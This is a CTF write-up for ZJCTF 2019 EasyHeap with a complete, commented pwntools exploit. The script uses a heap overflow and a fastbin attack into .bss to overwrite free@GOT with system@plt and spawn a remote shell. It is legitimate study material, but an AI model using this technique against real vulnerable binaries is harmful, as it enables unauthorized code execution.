[ZJCTF 2019]EasyHeap
puts(“——————————–”);
puts(“ Easy Heap Creator “);
puts(“——————————–”);
puts(“ 1. Create a Heap “);
puts(“ 2. Edit a Heap “);
puts(“ 3. Delete a Heap “);
puts(“ 4. Exit “);
puts(“——————————–”);
return printf(“Your choice :”);
from pwn import *
# Target setup. Host:port is the BUUOJ instance; the binary and libc paths are the
# author's local copies, so both must be adjusted when the script is reused.
context.update(os='linux', arch='amd64', log_level='debug')
elf = ELF("/home/rick/Downloads/easyheap/easyheap")
p = remote("node5.buuoj.cn",29263)
# Loaded but never used below: the exploit needs no libc leak because it jumps to
# system via the binary's own PLT entry (see elf.plt["system"] later in the script).
libc = ELF("/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
def debug():
    """Attach gdb to the target tube and block until the operator resumes.

    Only meaningful against a local process; `p` is a remote() tube here,
    so this helper is unused by the exploit and kept for local debugging.
    """
    gdb.attach(p)
    pause()
def alloc(size, content):
    """Menu option 1: request a chunk of `size` bytes and send `content` into it.

    `size` is forwarded as-is to the target (presumably its malloc size).
    `content` is bytes; sendline appends a newline, so the target also sees '\\n'.
    """
    exchanges = (
        ("Your choice :", b"1"),
        ("Size of Heap : ", str(size).encode()),
        ("Content of heap:", content),
    )
    for prompt, reply in exchanges:
        p.recvuntil(prompt)
        p.sendline(reply)
def edit(idx, size, content):
    """Menu option 2: overwrite the chunk stored at heap index `idx` with `content`.

    `size` is the byte count the target reads into the chunk. The script never
    bounds it by the chunk's allocated size, and the exploit below sends more
    than was allocated -- this unchecked length is the heap-overflow primitive.
    """
    def answer(prompt, data):
        p.recvuntil(prompt)
        p.sendline(data)

    answer("Your choice :", "2")
    answer("Index :", str(idx))
    answer("Size of Heap : ", str(size))
    answer("Content of heap : ", content)
def free(idx):
    """Menu option 3: free the chunk stored at heap index `idx`.

    Once free@GOT has been redirected (see the end of the script) this same
    menu entry becomes the system() call.
    """
    steps = [("Your choice :", "3"), ("Index :", str(idx))]
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)
# --- Exploit: fastbin attack into .bss, then GOT overwrite (glibc 2.23, no tcache) ---
# Note: every alloc/edit sends `size` bytes plus a '\n'; if the target reads exactly
# `size` bytes the newline is left for the next menu read. It worked against this
# instance, but keep it in mind if a prompt or read size changes.
# Fixed .bss address of the chunk-pointer array (0x60xxxx => non-PIE, never moves).
bss_heaparray = 0x6020E0
# Fake chunk header at 0x6020AD. Its "size" field is the qword at 0x6020B5; for the
# malloc(0x60) below to hand it out, glibc's fastbin index check needs that qword to
# look like a 0x70-class chunk (0x70..0x7f after masking). Which data supplies that
# value is not visible in this script -- presumably the 0x7f byte of a libc pointer
# stored nearby; confirm in gdb before reusing the offset. The fake chunk's user data
# then starts at 0x6020BD, i.e. 0x23 bytes before heaparray[0].
using_fake_chunk = bss_heaparray - 0x33
# Three 0x60 requests -> three 0x70-byte chunks assumed adjacent on a fresh heap
# (slots 0, 1, 2).
alloc(0x60,b"rick")
alloc(0x60,b"rick")
alloc(0x60,b"rick") #2
# Chunk 2 goes into the 0x70 fastbin; its fd (first user qword) is now the list head.
free(2)
# Overflow from chunk 1 into chunk 2: 0x68 bytes fill chunk 1's user area, with
# "/bin/sh\0" first because chunk 1 is what gets passed to system() at the end;
# p64(0x71) rewrites chunk 2's size with its existing value so the header stays valid;
# p64(using_fake_chunk) lands on chunk 2's fd. Fastbin list: chunk2 -> fake chunk.
# len(payload) == 0x78 > 0x60 requested: the edit menu copies whatever size is asked.
payload = b'/bin/sh\x00' +b'A'*0x60 + p64(0x71) + p64(using_fake_chunk)
edit(1,len(payload),payload)
# First malloc(0x60) returns chunk 2 (slot 2); the second returns the fake chunk,
# whose user pointer 0x6020BD is stored in slot 3.
alloc(0x60,b"rick")
alloc(0x60,b"rick") #alloc fake chunk
# Write through slot 3: 0x20 zero bytes + 3 'A' cover 0x6020BD..0x6020DF (this also
# clobbers whatever globals live in 0x6020C0..0x6020DF -- assumed not needed after
# this point), and the following qword is heaparray[0], now pointing at free@GOT.
payload=p64(0)*4+b'A'*0x3+p64(elf.got["free"])
edit(3,len(payload),payload)
# Write through slot 0 now hits free@GOT itself: free -> system@plt. Requires a
# writable GOT (partial RELRO -- check with checksec); elf.plt["system"] resolves only
# because the binary imports system itself, which is why no libc leak is needed.
payload = p64(elf.plt["system"])
edit(0,len(payload),payload) # now modify free got
# free(heaparray[1]) is now system(heaparray[1]) == system("/bin/sh").
free(1)
p.interactive()
通过修改bss静态段的heaparray来使idx0变成free的got表 然后写入system的plt 随后free就执行